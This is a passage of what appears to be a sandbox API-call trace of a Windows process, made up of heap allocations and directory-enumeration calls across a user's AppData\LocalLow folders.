Flags=0x0, Size=0x20) returned 0x32f9250 [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2df0 | out: hHeap=0x2c0000) returned 1 [0206.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86cf8 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b86cf8 | out: hHeap=0x2c0000) returned 1 [0206.263] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.263] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.263] PathFindFileNameW (pszPath="") returned="" [0206.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.263] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.263] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0206.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeec8 [0206.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eef60 [0206.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9250 [0206.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0206.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef60 | out: hHeap=0x2c0000) returned 1 [0206.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.264] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0206.264] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.264] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeec8 [0206.264] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eef60 [0206.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef60 | out: hHeap=0x2c0000) returned 1 [0206.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0206.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0206.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.264] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0206.264] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.265] PathFindFileNameW (pszPath="") returned="" [0206.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef60 | out: hHeap=0x2c0000) returned 1 [0206.265] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.265] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0206.265] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0206.265] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.265] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.265] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0206.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.266] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.266] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.266] PathFindFileNameW (pszPath="") returned="" [0206.266] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0206.267] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.267] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0206.267] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0206.267] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0206.267] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd78 | out: hHeap=0x2c0000) returned 1 [0206.267] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.267] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0206.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.268] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.268] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.268] PathFindFileNameW (pszPath="") returned="" [0206.268] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.269] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.269] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0206.269] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.270] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.270] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0206.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.270] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.270] PathFindFileNameW (pszPath="") returned="" [0206.270] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0206.270] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.271] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0206.271] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.271] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.271] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0206.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.271] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.271] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.271] PathFindFileNameW (pszPath="") returned="" [0206.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0206.272] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.272] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0206.272] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.272] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.273] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0206.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" 